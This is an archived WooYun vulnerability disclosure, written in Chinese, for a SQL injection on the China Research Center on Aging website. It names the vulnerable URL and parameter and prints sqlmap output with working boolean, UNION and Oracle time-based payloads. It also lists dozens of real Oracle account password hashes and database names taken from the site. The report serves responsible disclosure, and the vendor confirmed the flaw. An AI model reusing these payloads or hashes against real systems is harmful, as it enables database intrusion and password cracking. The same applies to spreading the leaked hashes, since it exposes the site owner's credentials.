乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-07: 细节已通知厂商并且等待厂商处理中 2014-08-12: 厂商已经确认,细节仅向厂商公开 2014-08-22: 细节向核心白帽子及相关领域专家公开 2014-09-01: 细节向普通白帽子公开 2014-09-11: 细节向实习白帽子公开 2014-09-21: 细节向公众公开
中国老龄科学研究中心SQL注射漏洞
1.注射点http://www.crca.cn/mojiyemian.jsp?digID=18&directoryid=182.注射信息
sqlmap identified the following injection points with a total of 262 HTTP(s) requests:---Place: GETParameter: directoryid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: digID=18&directoryid=18) AND 5636=5636 AND (9762=9762 Vector: AND [INFERENCE] Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: digID=18&directoryid=18) UNION ALL SELECT NULL,CHR(113)||CHR(121)||CHR(119)||CHR(102)||CHR(113)||CHR(82)||CHR(73)||CHR(97)||CHR(72)||CHR(102)||CHR(107)||CHR(102)||CHR(70)||CHR(105)||CHR(88)||CHR(113)||CHR(116)||CHR(118)||CHR(117)||CHR(113) FROM DUAL-- Vector: UNION ALL SELECT NULL,[QUERY] FROM DUAL-- Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: digID=18&directoryid=18) AND 6439=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(116)||CHR(113)||CHR(80),5) AND (3246=3246 Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)---[INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle
3.数据库用户信息
database management system users password hashes:[*] _NEXT_USER [1]: password hash: NULL[*] ANONYMOUS [1]: password hash: anonymous[*] APEX_PUBLIC_USER [1]: password hash: F6C9EE2C3CADA666[*] AQ_ADMINISTRATOR_ROLE [1]: password hash: NULL[*] AQ_USER_ROLE [1]: password hash: NULL[*] AUTHENTICATEDUSER [1]: password hash: NULL[*] BEIKIPS [1]: password hash: CAECA7FAE98B73A2[*] CONNECT [1]: password hash: NULL[*] CRCA [1]: password hash: A5F63EFDD17F9903[*] CRCAENGLISH [1]: password hash: 88DC072E658FDBB5[*] CRCANEW [1]: password hash: 1E54A458881FCA68[*] CSW_USR_ROLE [1]: password hash: F79FD2B778DEA3AA[*] CTXAPP [1]: password hash: NULL[*] CTXSYS [1]: password hash: 71E687F036AD56E5[*] CWM_USER [1]: password hash: NULL[*] DATAPUMP_EXP_FULL_DATABASE [1]: password hash: NULL[*] DATAPUMP_IMP_FULL_DATABASE [1]: password hash: NULL[*] DBA [1]: password hash: NULL[*] DBSNMP [1]: password hash: FFF45BB2C0C327EC[*] DELETE_CATALOG_ROLE [1]: password hash: NULL[*] DIP [1]: password hash: CE4A36B8E06CA59C[*] EJBCLIENT [1]: password hash: NULL[*] EXECUTE_CATALOG_ROLE [1]: password hash: NULL[*] EXFSYS [1]: password hash: 66F4EF5650C20355[*] EXP_FULL_DATABASE [1]: password hash: NULL[*] FLOWS_030000 [1]: password hash: 740D81CB124557D5[*] FLOWS_FILES [1]: password hash: FAAC7D435A68B6E7[*] GATHER_SYSTEM_STATISTICS [1]: password hash: NULL[*] GLOBAL_AQ_USER_ROLE [1]: password hash: GLOBAL[*] HS_ADMIN_ROLE [1]: password hash: NULL[*] IMP_FULL_DATABASE [1]: password hash: NULL[*] JAVA_ADMIN [1]: password hash: NULL[*] JAVA_DEPLOY [1]: password hash: NULL[*] JAVADEBUGPRIV [1]: password hash: NULL[*] JAVAIDPRIV [1]: password hash: NULL[*] JAVASYSPRIV [1]: password hash: NULL[*] JAVAUSERPRIV [1]: password hash: NULL[*] JMXSERVER [1]: password hash: NULL[*] LOGSTDBY_ADMINISTRATOR [1]: password hash: NULL[*] MDDATA [1]: password hash: DF02A496267DEE66[*] MDSYS [1]: password hash: 72979A94BAD2AF80[*] MGMT_USER [1]: password hash: NULL[*] MGMT_VIEW [1]: password hash: C716559F378B890D[*] OEM_ADVISOR [1]: password hash: NULL[*] OEM_MONITOR [1]: password hash: NULL[*] OLAP_DBA [1]: password hash: NULL[*] OLAP_USER [1]: password hash: NULL[*] OLAP_XS_ADMIN [1]: password hash: NULL[*] OLAPI_TRACE_USER [1]: password hash: NULL[*] OLAPSYS [1]: password hash: 4AC23CC3B15E2208[*] ORACLE_OCM [1]: password hash: 6D17CF1EB1611F94[*] ORDADMIN [1]: password hash: NULL[*] ORDPLUGINS [1]: password hash: 88A2B2C183431F00[*] ORDSYS [1]: password hash: 7EFA02EC7EA6B86F[*] OUTLN [1]: password hash: 4A3BA55E08595C81[*] OWB$CLIENT [1]: password hash: 13D492A4459DFE0D[*] OWB_DESIGNCENTER_VIEW [1]: password hash: 876EB62037E6316A[*] OWB_USER [1]: password hash: NULL[*] OWBSYS [1]: password hash: 610A3C38F301776F[*] PUBLIC [1]: password hash: NULL[*] RECOVERY_CATALOG_OWNER [1]: password hash: NULL[*] RESOURCE [1]: password hash: NULL[*] ROLLER [1]: password hash: 6CB6C4C7576EA4F1[*] SCHEDULER_ADMIN [1]: password hash: NULL[*] SCOTT [1]: password hash: F894844C34402B67[*] SELECT_CATALOG_ROLE [1]: password hash: NULL[*] SI_INFORMTN_SCHEMA [1]: password hash: 84B8CBCA4D477FA3[*] SPATIAL_CSW_ADMIN [1]: password hash: 093913703800E437[*] SPATIAL_CSW_ADMIN_USR [1]: password hash: 1B290858DD14107E[*] SPATIAL_WFS_ADMIN [1]: password hash: 32FA36DC781579AA[*] SPATIAL_WFS_ADMIN_USR [1]: password hash: 7117215D6BEE6E82[*] SYS [1]: password hash: 8A8F025737A9097A[*] SYSMAN [1]: password hash: 2CA614501F09FCCC[*] SYSTEM [1]: password hash: 2D594E86F93B17A1[*] TSMSYS [1]: password hash: 3DF26A8B17D0F29F[*] WFS_USR_ROLE [1]: password hash: 094C14AA84362687[*] WK_TEST [1]: password hash: 29802572EB547DBF[*] WKPROXY [1]: password hash: B97545C4DD2ABE54[*] WKSYS [1]: password hash: 69ED49EE1851900D[*] WKUSER [1]: password hash: NULL[*] WM_ADMIN_ROLE [1]: password hash: NULL[*] WMSYS [1]: password hash: 7C9BA362F8314299[*] XDB [1]: password hash: 88D8364765FCE6AF[*] XDB_SET_INVOKER [1]: password hash: NULL[*] XDB_WEBSERVICES [1]: password hash: NULL[*] XDB_WEBSERVICES_OVER_HTTP [1]: password hash: NULL[*] XDB_WEBSERVICES_WITH_PUBLIC [1]: password hash: NULL[*] XDBADMIN [1]: password hash: NULL[*] XS$NULL [1]: password hash: DC4FCC8CB69A6733
4.数据库信息
available databases [23]:[*] BEIKIPS[*] CRCA[*] CRCAENGLISH[*] CRCANEW[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_030000[*] FLOWS_FILES[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] ROLLER[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WK_TEST[*] WKSYS[*] WMSYS[*] XDB
修复注入
危害等级:中
漏洞Rank:10
确认时间:2014-08-12 09:12
CNVD确认并复现所述漏洞情况,已经由CNVD向网站公开邮箱发送通报。
暂无
